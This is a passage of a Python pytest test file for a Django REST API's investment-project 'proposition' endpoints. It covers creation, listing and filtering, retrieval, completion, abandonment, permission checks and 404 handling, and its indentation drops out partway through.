        investment_project = InvestmentProjectFactory(created_by=project_creator)
        url = reverse(
            'api-v3:investment:proposition:collection',
            kwargs={
                'project_pk': investment_project.pk,
            },
        )
        adviser = create_test_user(
            permission_codenames=[PropositionPermission.add_associated],
            dit_team=TeamFactory(),
        )
        api_client = self.create_api_client(user=adviser)
        response = api_client.post(
            url,
            {
                'name': 'My proposition.',
                'scope': 'Very broad scope.',
                'adviser': adviser.pk,
                'deadline': '2018-02-10',
            },
        )
        response_data = response.json()
        assert response.status_code == status.HTTP_403_FORBIDDEN
        assert response_data == {
            'detail': 'You do not have permission to perform this action.',
        }

    def test_cannot_created_with_fields_missing(self):
        """Test that proposition cannot be created without required fields."""
        investment_project = InvestmentProjectFactory()
        url = reverse(
            'api-v3:investment:proposition:collection',
            kwargs={
                'project_pk': investment_project.pk,
            },
        )
        response = self.api_client.post(url, {})
        assert response.status_code == status.HTTP_400_BAD_REQUEST
        response_data = response.json()
        assert response_data == {
            'adviser': ['This field is required.'],
            'deadline': ['This field is required.'],
            'name': ['This field is required.'],
            'scope': ['This field is required.'],
        }
class TestUpdateProposition(APITestMixin):
    """Tests for the update proposition view."""

    @pytest.mark.parametrize(
        'method', ('put', 'patch'),
    )
    def test_cannot_update_collection(self, method):
        """Test cannot update proposition."""
        investment_project = InvestmentProjectFactory()
        url = reverse(
            'api-v3:investment:proposition:collection',
            kwargs={
                'project_pk': investment_project.pk,
            },
        )
        response = getattr(self.api_client, method)(url)
        assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED

    @pytest.mark.parametrize(
        'method', ('put', 'patch'),
    )
    def test_cannot_update_item(self, method):
        """Test cannot update given proposition."""
        proposition = PropositionFactory()
        investment_project = InvestmentProjectFactory()
        url = reverse(
            'api-v3:investment:proposition:item',
            kwargs={
                'proposition_pk': proposition.pk,
                'project_pk': investment_project.pk,
            },
        )
        response = getattr(self.api_client, method)(
            url,
            data={
                'name': 'hello!',
            },
        )
        assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED
class TestListPropositions(APITestMixin):
    """Tests for the list propositions view."""

    @pytest.mark.parametrize('api_version', ('v3', 'v4'))
    @pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
    def test_non_restricted_user_can_list_propositions(self, permissions, api_version):
        """List of propositions by a non restricted user."""
        investment_project = InvestmentProjectFactory()
        PropositionFactory.create_batch(3)
        propositions = PropositionFactory.create_batch(
            3, investment_project=investment_project,
        )
        user = create_test_user(permission_codenames=permissions)
        api_client = self.create_api_client(user=user)
        if api_version == 'v3':
            url = reverse(
                'api-v3:investment:proposition:collection',
                kwargs={
                    'project_pk': investment_project.pk,
                },
            )
            response = api_client.get(url)
        else:
            url = reverse('api-v4:proposition:collection')
            response = api_client.get(url, {'investment_project_id': investment_project.pk})
        assert response.status_code == status.HTTP_200_OK
        response_data = response.json()
        assert response_data['count'] == 3
        actual_ids = {i['id'] for i in response_data['results']}
        expected_ids = {str(i.id) for i in propositions}
        assert actual_ids == expected_ids

    @pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
    def test_user_cannot_list_propositions_for_non_existent_investment_project(self, permissions):
        """Test user cannot list propositions for a non existent investment project."""
        url = reverse(
            'api-v3:investment:proposition:collection',
            kwargs={
                'project_pk': uuid.uuid4(),
            },
        )
        user = create_test_user(permission_codenames=permissions)
        api_client = self.create_api_client(user=user)
        response = api_client.get(url)
        assert response.status_code == status.HTTP_404_NOT_FOUND
        response_data = response.json()
        assert response_data == {'detail': 'Not found.'}

    @pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
    def test_filter_by_non_existent_investment_project(self, permissions):
        """Test user gets error when filtering by a non existent investment project."""
        url = reverse('api-v4:proposition:collection')
        user = create_test_user(permission_codenames=permissions)
        api_client = self.create_api_client(user=user)
        response = api_client.get(url, {'investment_project_id': uuid.uuid4()})
        assert response.status_code == status.HTTP_400_BAD_REQUEST
        response_data = response.json()
        assert response_data == {
            'investment_project_id': [
                'Select a valid choice. That choice is not one of the available choices.',
            ],
        }

    @pytest.mark.parametrize('api_version', ('v3', 'v4'))
    def test_restricted_user_can_list_propositions(self, api_version):
        """List of propositions by a restricted user."""
        PropositionFactory.create_batch(3)
        project_creator = AdviserFactory()
        investment_project = InvestmentProjectFactory(
            created_by=project_creator,
        )
        propositions = PropositionFactory.create_batch(
            3, investment_project=investment_project,
        )
        user = create_test_user(
            permission_codenames=(
                PropositionPermission.view_associated,
            ),
            dit_team=project_creator.dit_team,
        )
        api_client = self.create_api_client(user=user)
        if api_version == 'v3':
            url = reverse(
                'api-v3:investment:proposition:collection',
                kwargs={
                    'project_pk': investment_project.pk,
                },
            )
            response = api_client.get(url)
        else:
            url = reverse('api-v4:proposition:collection')
            response = api_client.get(url, {'investment_project_id': investment_project.pk})
        assert response.status_code == status.HTTP_200_OK
        response_data = response.json()
        assert response_data['count'] == 3
        actual_ids = {i['id'] for i in response_data['results']}
        expected_ids = {str(i.id) for i in propositions}
        assert actual_ids == expected_ids

    @pytest.mark.parametrize('api_version', ('v3', 'v4'))
    def test_restricted_user_cannot_list_non_associated_ip_propositions(self, api_version):
        """Restricted user cannot list non associated investment project propositions."""
        project_creator = AdviserFactory()
        investment_project = InvestmentProjectFactory(
            created_by=project_creator,
        )
        PropositionFactory.create_batch(
            3, investment_project=investment_project,
        )
        user = create_test_user(
            permission_codenames=(
                PropositionPermission.view_associated,
            ),
            dit_team=TeamFactory(),
        )
        api_client = self.create_api_client(user=user)
        if api_version == 'v3':
            url = reverse(
                'api-v3:investment:proposition:collection',
                kwargs={
                    'project_pk': investment_project.pk,
                },
            )
            response = api_client.get(url)
        else:
            url = reverse('api-v4:proposition:collection')
            response = api_client.get(url, {'investment_project_id': investment_project.pk})
        assert response.status_code == status.HTTP_403_FORBIDDEN
        response_data = response.json()
        assert response_data == {
            'detail': 'You do not have permission to perform this action.',
        }

    @pytest.mark.parametrize('api_version', ('v3', 'v4'))
    def test_filtered_by_adviser(self, api_version):
        """List of propositions filtered by assigned adviser."""
        adviser = AdviserFactory()
        investment_project = InvestmentProjectFactory()
        PropositionFactory.create_batch(
            3, investment_project=investment_project,
        )
        propositions = PropositionFactory.create_batch(
            3,
            adviser=adviser,
            investment_project=investment_project,
        )
        if api_version == 'v3':
            url = reverse(
                'api-v3:investment:proposition:collection',
                kwargs={
                    'project_pk': investment_project.pk,
                },
            )
            response = self.api_client.get(url, {'adviser_id': adviser.id})
        else:
            url = reverse('api-v4:proposition:collection')
            response = self.api_client.get(
                url,
                {
                    'adviser_id': adviser.id,
                    'investment_project_id': investment_project.pk,
                },
            )
        assert response.status_code == status.HTTP_200_OK
        response_data = response.json()
        assert response_data['count'] == 3
        actual_ids = {i['id'] for i in response_data['results']}
        expected_ids = {str(i.id) for i in propositions}
        assert actual_ids == expected_ids

    @pytest.mark.parametrize('api_version', ('v3', 'v4'))
    @pytest.mark.parametrize(
        'proposition_status',
        (
            PropositionStatus.ONGOING,
            PropositionStatus.ABANDONED,
            PropositionStatus.COMPLETED,
        ),
    )
    def test_filtered_by_status(self, proposition_status, api_version):
        """List of propositions filtered by status."""
        statuses = (
            PropositionStatus.ONGOING,
            PropositionStatus.ABANDONED,
            PropositionStatus.COMPLETED,
        )
        investment_project = InvestmentProjectFactory()
        PropositionFactory.create_batch(
            3,
            status=factory.Iterator(statuses),
            investment_project=investment_project,
        )
        if api_version == 'v3':
            url = reverse(
                'api-v3:investment:proposition:collection',
                kwargs={
                    'project_pk': investment_project.pk,
                },
            )
            response = self.api_client.get(url, {'status': proposition_status})
        else:
            url = reverse('api-v4:proposition:collection')
            response = self.api_client.get(
                url,
                {
                    'status': proposition_status,
                    'investment_project_id': investment_project.pk,
                },
            )
        assert response.status_code == status.HTTP_200_OK
response_data = response.json()
assert response_data['count'] == 1
assert response_data['results'][0]['status'] == proposition_status
class TestGetProposition(APITestMixin):
"""Tests for get proposition view."""
def test_fails_without_permissions(self, api_client):
"""Should return 401 if the user is unauthenticated."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
response = api_client.get(url)
assert response.status_code == status.HTTP_401_UNAUTHORIZED
@pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
def test_non_restricted_user_can_get_proposition(self, permissions):
"""Test get proposition by a non-restricted user."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_200_OK
response_data = response.json()
assert response_data == {
'id': str(proposition.pk),
'investment_project': {
'name': proposition.investment_project.name,
'project_code': proposition.investment_project.project_code,
'id': str(proposition.investment_project.pk),
},
'adviser': {
'first_name': proposition.adviser.first_name,
'last_name': proposition.adviser.last_name,
'name': proposition.adviser.name,
'id': str(proposition.adviser.pk),
},
'deadline': proposition.deadline.isoformat(),
'status': PropositionStatus.ONGOING,
'name': proposition.name,
'scope': proposition.scope,
'details': '',
'created_on': format_date_or_datetime(proposition.created_on),
'created_by': {
'first_name': proposition.created_by.first_name,
'last_name': proposition.created_by.last_name,
'name': proposition.created_by.name,
'id': str(proposition.created_by.pk),
},
'modified_on': format_date_or_datetime(proposition.modified_on),
'modified_by': {
'first_name': proposition.modified_by.first_name,
'last_name': proposition.modified_by.last_name,
'name': proposition.modified_by.name,
'id': str(proposition.modified_by.pk),
},
}
def test_restricted_user_can_get_proposition(self):
"""Test get proposition by a restricted user."""
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
url = reverse(
'api-v3:investment:proposition:item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(
permission_codenames=(
PropositionPermission.view_associated,
),
dit_team=project_creator.dit_team,
)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_200_OK
response_data = response.json()
assert response_data == {
'id': str(proposition.pk),
'investment_project': {
'name': proposition.investment_project.name,
'project_code': proposition.investment_project.project_code,
'id': str(proposition.investment_project.pk),
},
'adviser': {
'first_name': proposition.adviser.first_name,
'last_name': proposition.adviser.last_name,
'name': proposition.adviser.name,
'id': str(proposition.adviser.pk),
},
'deadline': proposition.deadline.isoformat(),
'status': PropositionStatus.ONGOING,
'name': proposition.name,
'scope': proposition.scope,
'details': '',
'created_on': format_date_or_datetime(proposition.created_on),
'created_by': {
'first_name': proposition.created_by.first_name,
'last_name': proposition.created_by.last_name,
'name': proposition.created_by.name,
'id': str(proposition.created_by.pk),
},
'modified_on': format_date_or_datetime(proposition.modified_on),
'modified_by': {
'first_name': proposition.modified_by.first_name,
'last_name': proposition.modified_by.last_name,
'name': proposition.modified_by.name,
'id': str(proposition.modified_by.pk),
},
}
def test_restricted_user_cannot_get_non_associated_ip_proposition(self):
"""Test that a restricted user cannot get a proposition for a non-associated investment project."""
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
url = reverse(
'api-v3:investment:proposition:item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(
permission_codenames=(
PropositionPermission.view_associated,
),
dit_team=TeamFactory(),
)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_403_FORBIDDEN
response_data = response.json()
assert response_data == {
'detail': 'You do not have permission to perform this action.',
}
@pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
def test_user_cannot_get_proposition_for_non_existent_project(self, permissions):
"""Test that a proposition cannot be retrieved for a non-existent investment project."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': uuid.uuid4(),
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_404_NOT_FOUND
response_data = response.json()
assert response_data == {'detail': 'Not found.'}
class TestDeleteProposition(APITestMixin):
"""Tests for delete proposition view."""
def test_fails_without_permissions(self, api_client):
"""Should return 401 if the user is unauthenticated."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
response = api_client.delete(url)
assert response.status_code == status.HTTP_401_UNAUTHORIZED
@pytest.mark.parametrize('permissions', NON_RESTRICTED_DELETE_PERMISSIONS)
def test_non_restricted_user_cannot_delete_proposition(self, permissions):
"""Test that a non-restricted user cannot delete a proposition (DELETE is not allowed)."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.delete(url)
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED
assert response.json() == {'detail': 'Method "DELETE" not allowed.'}
class TestCompleteProposition(APITestMixin):
"""Tests for the complete proposition view."""
@pytest.mark.parametrize('permissions', NON_RESTRICTED_CHANGE_PERMISSIONS)
def test_non_restricted_user_can_complete_proposition(self, permissions):
"""Test completing a proposition by a non-restricted user."""
user = create_test_user(permission_codenames=permissions)
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
entity_document.document.mark_as_scanned(True, '')
url = reverse(
'api-v3:investment:proposition:complete',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url)
proposition.refresh_from_db()
response_data = response.json()
assert response.status_code == status.HTTP_200_OK
assert proposition.modified_by == user
assert response_data == {
'id': str(proposition.pk),
'investment_project': {
'name': proposition.investment_project.name,
'project_code': proposition.investment_project.project_code,
'id': str(proposition.investment_project.pk),
},
'adviser': {
'first_name': proposition.adviser.first_name,
'last_name': proposition.adviser.last_name,
'name': proposition.adviser.name,
'id': str(proposition.adviser.pk),
},
'deadline': proposition.deadline.isoformat(),
'status': PropositionStatus.COMPLETED,
'name': proposition.name,
'scope': proposition.scope,
'created_on': format_date_or_datetime(proposition.created_on),
'created_by': {
'first_name': proposition.created_by.first_name,
'last_name': proposition.created_by.last_name,
'name': proposition.created_by.name,
'id': str(proposition.created_by.pk),
},
'details': '',
'modified_on': format_date_or_datetime(proposition.modified_on),
'modified_by': {
'first_name': proposition.modified_by.first_name,
'last_name': proposition.modified_by.last_name,
'name': proposition.modified_by.name,
'id': str(proposition.modified_by.pk),
},
}
@pytest.mark.parametrize('permissions', NON_RESTRICTED_CHANGE_PERMISSIONS)
def test_user_cannot_complete_proposition_for_non_existent_project(self, permissions):
"""Test user cannot complete a proposition for a non-existent investment project."""
user = create_test_user(permission_codenames=permissions)
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
entity_document.document.mark_as_scanned(True, '')
url = reverse(
'api-v3:investment:proposition:complete',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': uuid.uuid4(),
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url)
assert response.status_code == status.HTTP_404_NOT_FOUND
response_data = response.json()
assert response_data == {'detail': 'Not found.'}
def test_restricted_user_can_complete_proposition(self):
"""Test completing proposition by a restricted user."""
project_creator = AdviserFactory()
user = create_test_user(
permission_codenames=(
PropositionPermission.change_associated,
),
dit_team=project_creator.dit_team,
)
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
entity_document.document.mark_as_scanned(True, '')
url = reverse(
'api-v3:investment:proposition:complete',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url)
proposition.refresh_from_db()
assert response.status_code == status.HTTP_200_OK
response_data = response.json()
assert proposition.modified_by == user
assert response_data == {
'id': str(proposition.pk),
'investment_project': {
'name': proposition.investment_project.name,
'project_code': proposition.investment_project.project_code,
'id': str(proposition.investment_project.pk),
},
'adviser': {
'first_name': proposition.adviser.first_name,
'last_name': proposition.adviser.last_name,
'name': proposition.adviser.name,
'id': str(proposition.adviser.pk),
},
'deadline': proposition.deadline.isoformat(),
'status': PropositionStatus.COMPLETED,
'name': proposition.name,
'scope': proposition.scope,
'created_on': format_date_or_datetime(proposition.created_on),
'created_by': {
'first_name': proposition.created_by.first_name,
'last_name': proposition.created_by.last_name,
'name': proposition.created_by.name,
'id': str(proposition.created_by.pk),
},
'details': '',
'modified_on': format_date_or_datetime(proposition.modified_on),
'modified_by': {
'first_name': proposition.modified_by.first_name,
'last_name': proposition.modified_by.last_name,
'name': proposition.modified_by.name,
'id': str(proposition.modified_by.pk),
},
}
def test_restricted_user_cannot_complete_non_associated_ip_proposition(self):
"""Test restricted user cannot complete a non-associated investment project proposition."""
project_creator = AdviserFactory()
user = create_test_user(
permission_codenames=(
PropositionPermission.change_associated,
),
dit_team=TeamFactory(),
)
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
entity_document.document.mark_as_scanned(True, '')
url = reverse(
'api-v3:investment:proposition:complete',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url)
assert response.status_code == status.HTTP_403_FORBIDDEN
response_data = response.json()
assert response_data == {
'detail': 'You do not have permission to perform this action.',
}
proposition.refresh_from_db()
assert proposition.details == ''
assert proposition.modified_by != user
@pytest.mark.parametrize(
'proposition_status', (
PropositionStatus.COMPLETED, PropositionStatus.ABANDONED,
),
)
def test_cannot_complete_proposition_without_ongoing_status(self, proposition_status):
"""Test cannot complete proposition that doesn't have ongoing status."""
user = create_test_user(
permission_codenames=(
PropositionPermission.change_all,
),
dit_team=TeamFactory(),
)
proposition = PropositionFactory(
status=proposition_status,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
entity_document.document.mark_as_scanned(True, '')
url = reverse(
'api-v3:investment:proposition:complete',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url)
response_data = response.json()
assert response.status_code == status.HTTP_409_CONFLICT
detail = f'The action cannot be performed in the current status {proposition_status}.'
assert response_data['detail'] == detail
proposition.refresh_from_db()
assert proposition.status == proposition_status
assert proposition.details == ''
def test_cannot_complete_proposition_without_uploading_documents(self):
"""Test cannot complete proposition without uploading documents."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:complete',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
response = self.api_client.post(url)
assert response.status_code == status.HTTP_400_BAD_REQUEST
response_data = response.json()
assert response_data['non_field_errors'] == ['Proposition has no documents uploaded.']
proposition.refresh_from_db()
assert proposition.status == PropositionStatus.ONGOING
class TestAbandonProposition(APITestMixin):
"""Tests for the abandon proposition view."""
@pytest.mark.parametrize('permissions', NON_RESTRICTED_CHANGE_PERMISSIONS)
def test_non_restricted_user_can_abandon_proposition(self, permissions):
"""Test abandoning a proposition by a non-restricted user."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:abandon',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.post(
url,
{
'details': 'Not enough information.',
},
)
assert response.status_code == status.HTTP_200_OK
proposition.refresh_from_db()
response_data = response.json()
assert proposition.modified_by == user
assert response_data == {
'id': str(proposition.pk),
'investment_project': {
'name': proposition.investment_project.name,
'project_code': proposition.investment_project.project_code,
'id': str(proposition.investment_project.pk),
},
'adviser': {
'first_name': proposition.adviser.first_name,
'last_name': proposition.adviser.last_name,
'name': proposition.adviser.name,
'id': str(proposition.adviser.pk),
},
'deadline': proposition.deadline.isoformat(),
'status': PropositionStatus.ABANDONED,
'name': proposition.name,
'scope': proposition.scope,
'created_on': format_date_or_datetime(proposition.created_on),
'created_by': {
'first_name': proposition.created_by.first_name,
'last_name': proposition.created_by.last_name,
'name': proposition.created_by.name,
'id': str(proposition.created_by.pk),
},
'details': proposition.details,
'modified_on': format_date_or_datetime(proposition.modified_on),
'modified_by': {
'first_name': proposition.modified_by.first_name,
'last_name': proposition.modified_by.last_name,
'name': proposition.modified_by.name,
'id': str(proposition.modified_by.pk),
},
}
@pytest.mark.parametrize('permissions', NON_RESTRICTED_CHANGE_PERMISSIONS)
def test_user_cannot_abandon_proposition_for_non_existent_project(self, permissions):
"""Test user cannot abandon a proposition for a non-existent investment project."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:abandon',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': uuid.uuid4(),
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.post(
url,
{
'details': 'Not enough information.',
},
)
assert response.status_code == status.HTTP_404_NOT_FOUND
response_data = response.json()
assert response_data == {'detail': 'Not found.'}
def test_restricted_user_can_abandon_proposition(self):
"""Test abandoning proposition by restricted user."""
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
url = reverse(
'api-v3:investment:proposition:abandon',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(
permission_codenames=(
PropositionPermission.change_associated,
),
dit_team=project_creator.dit_team,
)
api_client = self.create_api_client(user=user)
response = api_client.post(
url,
{
'details': 'Not enough information.',
},
)
assert response.status_code == status.HTTP_200_OK
proposition.refresh_from_db()
response_data = response.json()
assert proposition.modified_by == user
assert response_data == {
'id': str(proposition.pk),
'investment_project': {
'name': proposition.investment_project.name,
'project_code': proposition.investment_project.project_code,
'id': str(proposition.investment_project.pk),
},
'adviser': {
'first_name': proposition.adviser.first_name,
'last_name': proposition.adviser.last_name,
'name': proposition.adviser.name,
'id': str(proposition.adviser.pk),
},
'deadline': proposition.deadline.isoformat(),
'status': PropositionStatus.ABANDONED,
'name': proposition.name,
'scope': proposition.scope,
'created_on': format_date_or_datetime(proposition.created_on),
'created_by': {
'first_name': proposition.created_by.first_name,
'last_name': proposition.created_by.last_name,
'name': proposition.created_by.name,
'id': str(proposition.created_by.pk),
},
'details': proposition.details,
'modified_on': format_date_or_datetime(proposition.modified_on),
'modified_by': {
'first_name': proposition.modified_by.first_name,
'last_name': proposition.modified_by.last_name,
'name': proposition.modified_by.name,
'id': str(proposition.modified_by.pk),
},
}
def test_restricted_user_cannot_abandon_non_associated_ip_proposition(self):
"""Test restricted user cannot abandon a non-associated investment project proposition."""
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
url = reverse(
'api-v3:investment:proposition:abandon',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(
permission_codenames=(
PropositionPermission.change_associated,
),
dit_team=TeamFactory(),
)
api_client = self.create_api_client(user=user)
response = api_client.post(
url,
{
'details': 'Not enough information.',
},
)
assert response.status_code == status.HTTP_403_FORBIDDEN
response_data = response.json()
assert response_data == {
'detail': 'You do not have permission to perform this action.',
}
proposition.refresh_from_db()
assert proposition.details == ''
assert proposition.modified_by != user
@pytest.mark.parametrize(
'proposition_status', (
PropositionStatus.COMPLETED, PropositionStatus.ABANDONED,
),
)
def test_cannot_abandon_proposition_without_ongoing_status(self, proposition_status):
"""Test cannot abandon proposition that doesn't have ongoing status."""
proposition = PropositionFactory(
status=proposition_status,
)
url = reverse(
'api-v3:investment:proposition:abandon',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
response = self.api_client.post(
url,
{
'details': 'Too many cats.',
},
)
assert response.status_code == status.HTTP_409_CONFLICT
response_data = response.json()
detail = f'The action cannot be performed in the current status {proposition_status}.'
assert response_data['detail'] == detail
proposition.refresh_from_db()
assert proposition.status == proposition_status
assert proposition.details == ''
def test_cannot_abandon_proposition_without_details(self):
"""Test cannot abandon proposition without giving details."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:abandon',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
response = self.api_client.post(
url,
{
'details': '',
},
)
assert response.status_code == status.HTTP_400_BAD_REQUEST
response_data = response.json()
assert response_data['details'] == ['This field may not be blank.']
proposition.refresh_from_db()
assert proposition.status == PropositionStatus.ONGOING
@pytest.mark.parametrize('http_method', ('get', 'post'))
class TestPropositionDocumentCollectionView404Handling(APITestMixin):
"""Tests for 404-handling in the proposition document collection view."""
def test_returns_404_for_non_existent_project(self, http_method):
"""Test that a 404 is returned if a non-existent project is specified."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'project_pk': uuid.uuid4(),
'proposition_pk': proposition.pk,
},
)
response = self.api_client.generic(http_method, url)
assert response.status_code == status.HTTP_404_NOT_FOUND
def test_returns_404_for_non_existent_proposition(self, http_method):
"""Test that a 404 is returned if a non-existent proposition is specified."""
project = InvestmentProjectFactory()
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'project_pk': project.pk,
'proposition_pk': uuid.uuid4(),
},
)
response = self.api_client.generic(http_method, url)
assert response.status_code == status.HTTP_404_NOT_FOUND
def test_returns_404_for_mismatched_proposition_and_project(self, http_method):
"""Test that a 404 is returned if an unrelated project and proposition are specified."""
proposition = PropositionFactory()
project = InvestmentProjectFactory()
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'project_pk': project.pk,
'proposition_pk': proposition.pk,
},
)
response = self.api_client.generic(http_method, url)
assert response.status_code == status.HTTP_404_NOT_FOUND
@pytest.mark.parametrize(
'urlname,http_method',
(
('api-v3:investment:proposition:document-item', 'get'),
('api-v3:investment:proposition:document-item', 'delete'),
('api-v3:investment:proposition:document-item-callback', 'post'),
('api-v3:investment:proposition:document-item-download', 'get'),
),
)
class TestPropositionDocumentItemViews404Handling(APITestMixin):
"""Tests for 404-handling in all proposition document item views."""
def test_returns_404_for_non_existent_project(self, urlname, http_method):
"""Test that a 404 is returned if a non-existent project is specified."""
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=self.user,
)
url = reverse(
urlname,
kwargs={
'project_pk': uuid.uuid4(),
'proposition_pk': proposition.pk,
'entity_document_pk': entity_document.pk,
},
)
response = self.api_client.generic(http_method, url)
assert response.status_code == status.HTTP_404_NOT_FOUND
def test_returns_404_for_non_existent_proposition(self, urlname, http_method):
"""Test that a 404 is returned if a non-existent proposition is specified."""
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=self.user,
)
url = reverse(
urlname,
kwargs={
'project_pk': proposition.investment_project.pk,
'proposition_pk': uuid.uuid4(),
'entity_document_pk': entity_document.pk,
},
)
response = self.api_client.generic(http_method, url)
assert response.status_code == status.HTTP_404_NOT_FOUND
def test_returns_404_for_non_existent_document(self, urlname, http_method):
"""Test that a 404 is returned if a non-existent document is specified."""
proposition = PropositionFactory()
url = reverse(
urlname,
kwargs={
'project_pk': proposition.investment_project.pk,
'proposition_pk': proposition.pk,
'entity_document_pk': uuid.uuid4(),
},
)
response = self.api_client.generic(http_method, url)
assert response.status_code == status.HTTP_404_NOT_FOUND
def test_returns_404_for_unrelated_project(self, urlname, http_method):
"""Test that a 404 is returned if an unrelated project is specified."""
unrelated_project = InvestmentProjectFactory()
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=self.user,
)
url = reverse(
urlname,
kwargs={
'project_pk': unrelated_project.pk,
'proposition_pk': proposition.pk,
'entity_document_pk': entity_document.pk,
},
)
response = self.api_client.generic(http_method, url)
assert response.status_code == status.HTTP_404_NOT_FOUND
def test_returns_404_for_unrelated_proposition(self, urlname, http_method):
"""Test that a 404 is returned if an unrelated proposition is specified."""
proposition = PropositionFactory()
unrelated_proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=self.user,
)
url = reverse(
urlname,
kwargs={
'project_pk': proposition.investment_project.pk,
'proposition_pk': unrelated_proposition.pk,
'entity_document_pk': entity_document.pk,
},
)
response = self.api_client.generic(http_method, url)
assert response.status_code == status.HTTP_404_NOT_FOUND
class TestPropositionDocumentViews(APITestMixin):
"""Tests for the proposition document views."""
@pytest.mark.parametrize('permissions', NON_RESTRICTED_ADD_PERMISSIONS)
@patch.object(Document, 'get_signed_upload_url')
def test_document_creation(self, get_signed_upload_url_mock, permissions):
"""Test document creation."""
get_signed_upload_url_mock.return_value = 'http://document-about-ocelots'
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
